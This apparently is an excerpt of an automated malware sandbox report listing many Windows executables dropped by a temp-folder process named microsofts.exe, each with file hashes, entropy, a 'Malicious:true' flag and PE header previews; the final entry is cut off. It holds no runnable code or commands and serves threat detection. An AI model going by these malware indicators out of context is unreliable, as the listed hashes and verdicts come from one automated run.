                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:PWBWUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PWBWUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2AD22D67EB79D94A78AF5DA3A1F24257
                                                                                                                                                                                                                                                                                                          SHA1:5AECA85D0F7184485A1FDC93C4B53861B77AB062
                                                                                                                                                                                                                                                                                                          SHA-256:37FC0374F99511932DB9F63A007B7EEFC1337E03EC47A9DB330CD773205BB0F3
                                                                                                                                                                                                                                                                                                          SHA-512:A7DB42AAD5250E2D0A105711E08297690B3B9C724FDD55AFA4C26A281D82889830C2CDC410E4F04D708BF9FDDF627F6695DCA10F9015DA99D043F44F17A8E883
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`......"&.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1683968
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.228477153490509
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:if9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0nsqjnhMgeiCl7G0nehbGZpbD:i+GtCi27mVTyT+a07Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F50FEED36ABFE427C7AB87B4658EA688
                                                                                                                                                                                                                                                                                                          SHA1:31A73260393F5BF92DA793373BAC5CDE07FDB91D
                                                                                                                                                                                                                                                                                                          SHA-256:31DFA77C16CE582D33C561098360277A8F89CEBE19F94ABEFC11EFF399A714F1
                                                                                                                                                                                                                                                                                                          SHA-512:5536B84850949830C7D52A85932A75BBAAAE654A2ECBA45E7AEFC1C11CE313CD1D8A9050780374AF6FEBB599699B5545CE26BD5E4D9C4D3286C3DFD9FEE27E93
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3110912
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.649646544947405
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:NU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYkDmg27RnWGj:i2NfHOIK5Ns6qR96D527BWG
                                                                                                                                                                                                                                                                                                          MD5:FC5A0E95874B3812637A0DCEFD695C02
                                                                                                                                                                                                                                                                                                          SHA1:F8D5F98BA4DADC6F205A99E59D91594F3F686061
                                                                                                                                                                                                                                                                                                          SHA-256:A96AB7DCC306B4296CE06F14590008CED2674720EBB343DC7405117BE6A20AC7
                                                                                                                                                                                                                                                                                                          SHA-512:883CCC86CA76E9CF3C9F192D4C7E12BCBF977442AA76DB46BEA73F28F124F95762160425418604F1C8F84948112B6D2E3CEFCF2B3FB8977C0F21F911FAB1FE6A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1588224
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.531902487947546
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:PkcWTUQcydQsqjnhMgeiCl7G0nehbGZpbD:PhKUzDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:DAB74EF8F8221BC0791E0BA91A7C8B06
                                                                                                                                                                                                                                                                                                          SHA1:63562A4D4C55AB05CAF2AFDDDAD1AC93444663D5
                                                                                                                                                                                                                                                                                                          SHA-256:8A20F3DF409ECA1717B880CB49AC2379CB9AE855AA3B85B1D63BDE292CFE7198
                                                                                                                                                                                                                                                                                                          SHA-512:C80CEF9000584DE030737E426B0A902C141CE2E82F6B4CA12F8B7962E85E459FF02AC2E2F4574A1902F4544A80B17CBD493F7FC42C0212CFB6ADDE1878EDCC71
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1338368
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.352646938503899
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:ffY+FUBXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fA+qBXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:ED61CB19AF3266874A0D418CCC0C5E89
                                                                                                                                                                                                                                                                                                          SHA1:28F77FD1582FFC772500054D0D16FB1B915724BA
                                                                                                                                                                                                                                                                                                          SHA-256:E800562C8C211BD352DE48DF08A851833308B0DC8BCFB646A85CB01125A8FA48
                                                                                                                                                                                                                                                                                                          SHA-512:99E99553EA8BF371B7F4EB9B2542CCB1AA4AAF960E25F07E8240DBAD78EEC590087E7B1095EA67204D4EBDEE78970B41060F1FCA8F2B52F055982D98CE5C706B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................(...............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1143296
Entropy (8bit): 5.022660438249206
Encrypted: false
SSDEEP: 12288:kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ksqjnhMgeiCl7G0nehbGZpbD
MD5: 79473D5F47129F71430EFC25DD48A2EB
SHA1: 502D7C77D6F436118D28AC8F6648DAA78153737F
SHA-256: 628CF57A056EAD13E4F696DCEF9320EA57F06B54E3087C6E372B941AFB50C129
SHA-512: BDFFF65632DF33481BFE61E07FB6793A31C71C20BFC5796918628960F3C6AF098E8ED5029652041FB18CF1BE98A384B3CE9DEDC51EC581A27C4BC5A2B7C30E5E
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1161728
Entropy (8bit): 5.0471454182145745
Encrypted: false
SSDEEP: 12288:aDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IsqjnhMgeiCl7G0nehbGZpbD
MD5: 1B8D37B5883A5045D71522AAC5AE4C16
SHA1: C7BD31536A6CAEFC73AE8053E961E94D07F67118
SHA-256: 7E2959EB1653C13AE87FD7E1169C71C3A8E092C420C67949020EEA4EF733C2E2
SHA-512: EB812EB2074591DBE5C815C19C21CE6BCEB59FAAC3D497A37812AD8FA1D4EB92631AA7E5D7EEC411A73C3C4B3AE8B967B3F2ABE521D559E26EB0EEF46694B23D
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4151808
Entropy (8bit): 6.499769232365763
Encrypted: false
SSDEEP: 49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755eDmg27RN:UjEIa4HIEWOc5ED527BWG
MD5: 464AEA4F23C07CAD08DE0A7CABEF3B44
SHA1: BD344FD151B6B9EB7AA6EA2AA6D7A30124DFAF56
SHA-256: F37193B6876277076DC2B65CC5CDE0E95E3DF9A7C161ED09ED14205C29F7EE8D
SHA-512: 1B5A56006705222021BB8CE65698ECBFA86F8878D24CC876B8D03D58B8F0BC97CC98B04C7E24EBABCC4F9118CE0263E7E85AD2301A8FF1D0F2E11041B1060215
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 59941376
Entropy (8bit): 7.999367283745036
Encrypted: true
SSDEEP: 1572864:6Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:xXhwMhe6AABPiQwF6xQ22R
MD5: 4D49E031F0304B3B417B6FBB8CC2DE1D
SHA1: C06E95DF29FAB0EBF42FDCCBE19917F120100BEC
SHA-256: A5C820B526D30EE77CB3B7F0035996A94067EF0F1F75F69B609DE3833A8C977E
SHA-512: BBA5D4698A127F5D87B9DA27B3D21D9C205A162302949A6886942F871F8071EC139F1C21DC584E8804DD08925A0DC37A97ED5A7F536C5B526D833889319B97AB
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1230336
Entropy (8bit): 5.18558467537154
Encrypted: false
SSDEEP: 12288:iejVWYUADXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fjkY7DsqjnhMgeiCl7G0nehbGZpbD
MD5: 874F9CD346E1F4A64FB85556E9869D87
SHA1: C1C2DEF01CE418D44D6E362EDBCC2F245358552F
SHA-256: D0BE6E3835592520E98DAB4F41DCA48CD3C0DF4477D7E1BFC74D302FB4C1289D
SHA-512: 77638C0D7E865FE767213F124FA224AE9E37D2F2736208AEAD364A7A85373A9E92D5923E5C0C76417E43F503AAFA5D12942D7CE5F17089833527FC94C8155D53
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1384960
Entropy (8bit): 5.377794253705876
Encrypted: false
SSDEEP: 24576:YxwSJhkrmZs/sqjnhMgeiCl7G0nehbGZpbD:Yy+krKsjDmg27RnWGj
MD5: 16A36BB31744ACE606AC51B77D37A1A4
SHA1: 3AF02C248EF9CDEA1D908CF8C260094765DDA90B
SHA-256: E80C67DB786ED608CF4376D80577D03350BE3F1AB73284C69F25744FC1957777
SHA-512: CB30E77DB829431F921CFDCA6702D1A333F2D8F9E8086A1F44CD3F5DCCFF677FB10857048553089B528DF9A5E7D157B1FC96E038DF0600F9A6EF6A6975C603C7
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1649152
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.632711566208625
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:5HQJLIRgvsnNOsqjnhMgeiCl7G0nehbGZpbD:5HQJL34iDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:8C4D376220E8F4D14144FE7A6B2B4A57
                                                                                                                                                                                                                                                                                                          SHA1:DC1AF329505001C6603F442B00F36DBB0B5A73A9
                                                                                                                                                                                                                                                                                                          SHA-256:F5C19E4A1F41E7CA65EC28F6A4A6671020C40A9AC11B86B9C2DB4D173826E588
                                                                                                                                                                                                                                                                                                          SHA-512:E41EBB23CC4FC5DDDE8B6351C7110CD0F41F0187C6D55960FE14F584E4BCC509E55C9D1254C517B4A5A9C1731065C60A58442CC04878B5DEE72CF24FB55525E7
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):5365760
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.450965997295338
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:rUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kJ:QWmXL6DEC7dRpKuDQbgJD527BWG
                                                                                                                                                                                                                                                                                                          MD5:6D78F95D71614511503126D9ACC93F6D
                                                                                                                                                                                                                                                                                                          SHA1:BE4970F098BB7E84E8349D7EA78332A9A94A1B8F
                                                                                                                                                                                                                                                                                                          SHA-256:451D6CB2FA5B2E6ABA7F051C4348D2A11DCFFBF0512BE5A13F7787BC61C9E808
                                                                                                                                                                                                                                                                                                          SHA-512:EC9547153A2C1A5CB96DDBCCFBF337A537B4815F40D70A4CB416BC8C8E6A99C31FCE4EBFBF39F2F6A6A82E937ECC307180C2C13ED0F0E5EEB1A643E7152EC5B5
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....-.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3163136
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972779926146036
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:0rZ23AbsK6Ro022JjL2WEiVqJZ+D527BWG:eJADmmxL2WEoCZ+VQBWG
                                                                                                                                                                                                                                                                                                          MD5:0CF83F5535AE328C318EC07B717289CB
                                                                                                                                                                                                                                                                                                          SHA1:677C71412B5C165F91577E3C192F27FC56CDD764
                                                                                                                                                                                                                                                                                                          SHA-256:C967E2F191FECF69AC6219B8C53DCA89C851397DDD807C9B4BA60C6FF731E25F
                                                                                                                                                                                                                                                                                                          SHA-512:97FD132162F5177E2D5803872C0382D404573EB8F2ADBDEA828F5B3BC76CE6A673CFBBE89E3C9E30D85C48D6254CB5A202FC6A30B61DE3264EE90E879CC6679C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1213440
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.20487966477891
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:IfrYY42wd7hlOw9fpkEE64vsqjnhMgeiCl7G0nehbGZpbD:Fz9xrSTDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:81A4FFFF31611F07CF9079B11B4721BE
                                                                                                                                                                                                                                                                                                          SHA1:9F42CE01B00DE4F56395670BFAEC244E3ACD8C48
                                                                                                                                                                                                                                                                                                          SHA-256:907AAE1FAE64E1C66A0DCB9DF484994230EE7CCF5034163F1855F5EF71575A2B
                                                                                                                                                                                                                                                                                                          SHA-512:EAC19D10B49DC2589C7607915DEAEA0C6187BF114A77F2C8789468412E8625F0714E97D0783E918FB9E56F64A7247E0260146E3DA2F4112BCBF29C72F176269D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1388544
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.272929616101656
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:OwkNKiZ+R2GGNUbTF5YXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:OzNKUE5YsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:4E7D5F5AFBA85853B444D293F6B56981
                                                                                                                                                                                                                                                                                                          SHA1:30F8B23007153188638099E5266347588AE61B1F
                                                                                                                                                                                                                                                                                                          SHA-256:909CCF2381A2D809EEC40E81BD513399D563032A89C6D7B8A1673367C4449469
                                                                                                                                                                                                                                                                                                          SHA-512:1D0222984F8A5FD844AB0DF17F9E5184BA6C0B4F20BF90E5612BD978C841439BC8E2B92599772383203FCC662D7AA6819BFACC7B3EE52AEE8EEBEA5F965D0CD6
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):5855744
Entropy (8bit):6.574321947166506
Encrypted:false
SSDEEP:98304:7ALuzDKnxCp3JKNrPJzruaI6HMaJTtGbFD527BWG:caGg3cFPIaI6HMaJTtGbFVQBWG
MD5:58D91A7683A5B595C621C732605EFB6B
SHA1:97209B655AA88311CF45774D056E98DA8929ED29
SHA-256:BAA60EE69FF387DB65F75E9032CD968B1218A04EDD3EDE3782437F894FC34E0C
SHA-512:B620754C8196ED482863351E05BF8B5B8D7B942F8D0EF1397CA21F043B920ADA32A7B17AE6DE190FED20DCEB0DF375059AB92F3ED622976401DDB59E58636BBB
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1312768
Entropy (8bit):5.356048924270396
Encrypted:false
SSDEEP:24576:SXr/SVMxWLsqjnhMgeiCl7G0nehbGZpbD:K1x+Dmg27RnWGj
MD5:6CF50C9A5EB19C2B73D5D1034B2E177F
SHA1:30BBF9822FF8EAFE9D70563AC6FB0EDC6EF9CAB8
SHA-256:493A8F50ED1C3E48397AF86B0E53255524F303662C8EC29CB98DB01E4925F7EC
SHA-512:332276EC2476414B6388C242AAA43CBF3D9BE30EA5F39115AC6D1048FEF985D608E8B5E4EDF9C39EBCF893A8CB320551A707E15E00A6EB6CCAA8114DD2C500B9
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):27533312
Entropy (8bit):6.24863573148766
Encrypted:false
SSDEEP:196608:EhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOZVQBWG:EhRCpGpMJMrbp8JjpNdNlc57B
MD5:DD22339E4E2C4B7CE2D26BBB76A2A652
SHA1:19AAEB256553DD91DB1B301548CA94E8BE38B713
SHA-256:DC331157005B091F2CCC2A3276AF37F38CD5D1EA9D721E3C64F46755F2E7D8D1
SHA-512:2184A2D66DF764248D78828BC63935F4F3E25536F22F33AE3B8653BD3547EF889F117BC12A1C1B311563B087DE6E3FFD70A85D1C94F96194A08F39B92AAF0FC9
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2199552
Entropy (8bit):6.789002477325301
Encrypted:false
SSDEEP:49152:h83pZ3kd0CuEeN0LUmRXzYs65mxDmg27RnWGj:JKuUQY15yD527BWG
MD5:C08BF75AAED9A03556E5C74639D923E8
SHA1:54DCB32E53F81D6814FB6A926F31914906884BDC
SHA-256:4AC0410F805846FB8426A5E62D6F27EB20F633A9130456DF314DC6E339A10E3B
SHA-512:59EF7D65E7B51E85C489E190A6C9A05D7A9C8F6B6031F526BEAEEBD339CA34D049FDCC2AEC9B353E511BB148A54FAD884F6E9DD84727CF547BF96598D56F9C2B
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......."... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):4971008
Entropy (8bit):6.670828920786754
Encrypted:false
SSDEEP:49152:AErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Ms:WA4oGlcR+glEdOPKzgVZfD527BWG
MD5:1EAB154180792C6EA5DDA6BF72150468
SHA1:BC317046F09743C7CFA7FF3939244C9A79EBCF51
